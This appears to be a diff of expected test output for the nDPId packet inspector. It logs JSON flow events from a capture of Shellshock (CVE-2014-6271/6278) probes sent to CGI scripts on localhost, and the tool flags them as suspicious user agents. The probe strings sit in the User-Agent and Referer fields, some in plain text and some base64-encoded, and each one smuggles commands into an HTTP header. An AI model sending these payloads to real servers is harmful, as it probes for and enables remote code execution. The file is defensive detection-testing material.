+01166{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":458,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":458,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277410,"flow_last_seen":1576420277410,"flow_idle_time":7580000,"flow_min_l4_payload_len":223,"flow_max_l4_payload_len":223,"flow_tot_l4_payload_len":223,"flow_avg_l4_payload_len":223,"midstream":1,"thread_ts_msec":1576420277410,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50478,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/FormMail-clone.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":459,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":459,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277412,"flow_last_seen":1576420277412,"flow_idle_time":7580000,"flow_min_l4_payload_len":218,"flow_max_l4_payload_len":218,"flow_tot_l4_payload_len":218,"flow_avg_l4_payload_len":218,"midstream":1,"thread_ts_msec":1576420277412,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50480,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00771{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":459,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":459,"flow_packet_id":1,"flow_last_seen":1576420277412,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":284,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":284,"pkt_l4_len":250,"thread_ts_msec":1576420277412,"pkt":"AAAAAAAAAAAAAAAACABFAAEOAyBAAEAGOMh\/AAABfwAAAcUwH5BOyzvYEAppQYAYAED\/AgAAAQEICp1m\/cydZv3MR0VUIC9ndWVzdGJvb2suY2dpIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01161{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":459,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":459,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277412,"flow_last_seen":1576420277412,"flow_idle_time":7580000,"flow_min_l4_payload_len":218,"flow_max_l4_payload_len":218,"flow_tot_l4_payload_len":218,"flow_avg_l4_payload_len":218,"midstream":1,"thread_ts_msec":1576420277412,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50480,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/guestbook.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 
+01161{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":459,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":459,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277412,"flow_last_seen":1576420277412,"flow_idle_time":7580000,"flow_min_l4_payload_len":218,"flow_max_l4_payload_len":218,"flow_tot_l4_payload_len":218,"flow_avg_l4_payload_len":218,"midstream":1,"thread_ts_msec":1576420277412,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50480,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/guestbook.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":460,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":460,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277414,"flow_last_seen":1576420277414,"flow_idle_time":7580000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"thread_ts_msec":1576420277414,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50482,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00771{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":460,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":460,"flow_packet_id":1,"flow_last_seen":1576420277414,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":283,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":283,"pkt_l4_len":249,"thread_ts_msec":1576420277414,"pkt":"AAAAAAAAAAAAAAAACABFAAENCPdAAEAGMvJ\/AAABfwAAAcUyH5A4wTA94El3uoAYAED\/AQAAAQEICp1m\/c6dZv3OR0VUIC9oZWxwZGVzay5jZ2kgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01160{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":460,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":460,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277414,"flow_last_seen":1576420277414,"flow_idle_time":7580000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"thread_ts_msec":1576420277414,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50482,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/helpdesk.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 
+01160{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":460,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":460,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277414,"flow_last_seen":1576420277414,"flow_idle_time":7580000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"thread_ts_msec":1576420277414,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50482,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/helpdesk.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":461,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":461,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277416,"flow_last_seen":1576420277416,"flow_idle_time":7580000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420277416,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50484,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":461,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":461,"flow_packet_id":1,"flow_last_seen":1576420277416,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":280,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":280,"pkt_l4_len":246,"thread_ts_msec":1576420277416,"pkt":"AAAAAAAAAAAAAAAACABFAAEKgptAAEAGuVB\/AAABfwAAAcU0H5CIJLpUcW+qJoAYAED+\/gAAAQEICp1m\/dCdZv3QR0VUIC9pbmRleC5jZ2kgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01157{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":461,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":461,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277416,"flow_last_seen":1576420277416,"flow_idle_time":7580000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420277416,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50484,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 
+01157{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":461,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":461,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277416,"flow_last_seen":1576420277416,"flow_idle_time":7580000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420277416,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50484,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":462,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":462,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277417,"flow_last_seen":1576420277417,"flow_idle_time":7580000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420277417,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50486,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":462,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":462,"flow_packet_id":1,"flow_last_seen":1576420277417,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":280,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":280,"pkt_l4_len":246,"thread_ts_msec":1576420277417,"pkt":"AAAAAAAAAAAAAAAACABFAAEKMxlAAEAGCNN\/AAABfwAAAcU2H5CRJgvewUykPIAYAED+\/gAAAQEICp1m\/dGdZv3RR0VUIC9pbmRleC5waHAgSFRUUC8xLjENClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01157{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":462,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":462,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277417,"flow_last_seen":1576420277417,"flow_idle_time":7580000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420277417,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50486,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 
+01157{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":462,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":462,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277417,"flow_last_seen":1576420277417,"flow_idle_time":7580000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420277417,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50486,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":463,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":463,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277419,"flow_last_seen":1576420277419,"flow_idle_time":7580000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420277419,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50488,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00763{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":463,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":463,"flow_packet_id":1,"flow_last_seen":1576420277419,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":279,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":279,"pkt_l4_len":245,"thread_ts_msec":1576420277419,"pkt":"AAAAAAAAAAAAAAAACABFAAEJrmtAAEAGjYF\/AAABfwAAAcU4H5CXuZakZnwUBoAYAED+\/QAAAQEICp1m\/dOdZv3TR0VUIC9pbmRleC5wbCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogKCkgeyA6OyB9OyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02MjcxOiB0cnVlO2VjaG87ZWNobzsNCg0K"} -01156{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":463,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":463,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277419,"flow_last_seen":1576420277419,"flow_idle_time":7580000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420277419,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50488,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.pl","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 
+01156{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":463,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":463,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277419,"flow_last_seen":1576420277419,"flow_idle_time":7580000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420277419,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50488,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.pl","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":464,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":464,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277420,"flow_last_seen":1576420277420,"flow_idle_time":7580000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420277420,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50490,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00764{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":464,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":464,"flow_packet_id":1,"flow_last_seen":1576420277420,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":279,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":279,"pkt_l4_len":245,"thread_ts_msec":1576420277420,"pkt":"AAAAAAAAAAAAAAAACABFAAEJZRVAAEAG1td\/AAABfwAAAcU6H5C6AV3ZPf\/xToAYAED+\/QAAAQEICp1m\/dSdZv3UR0VUIC9pbmZvLmNnaSBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogKCkgeyA6OyB9OyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02MjcxOiB0cnVlO2VjaG87ZWNobzsNClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01156{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":464,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":464,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277420,"flow_last_seen":1576420277420,"flow_idle_time":7580000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420277420,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50490,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/info.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 
+01156{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":464,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":464,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277420,"flow_last_seen":1576420277420,"flow_idle_time":7580000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420277420,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50490,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/info.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":465,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":465,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277422,"flow_last_seen":1576420277422,"flow_idle_time":7580000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420277422,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50492,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00763{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":465,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":465,"flow_packet_id":1,"flow_last_seen":1576420277422,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":278,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":278,"pkt_l4_len":244,"thread_ts_msec":1576420277422,"pkt":"AAAAAAAAAAAAAAAACABFAAEI0gtAAEAGaeJ\/AAABfwAAAcU8H5DcN+rDzEDc2oAYAED+\/AAAAQEICp1m\/dadZv3WR0VUIC9pbmZvLnNoIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KDQo="} -01155{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":465,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":465,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277422,"flow_last_seen":1576420277422,"flow_idle_time":7580000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420277422,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50492,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/info.sh","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 
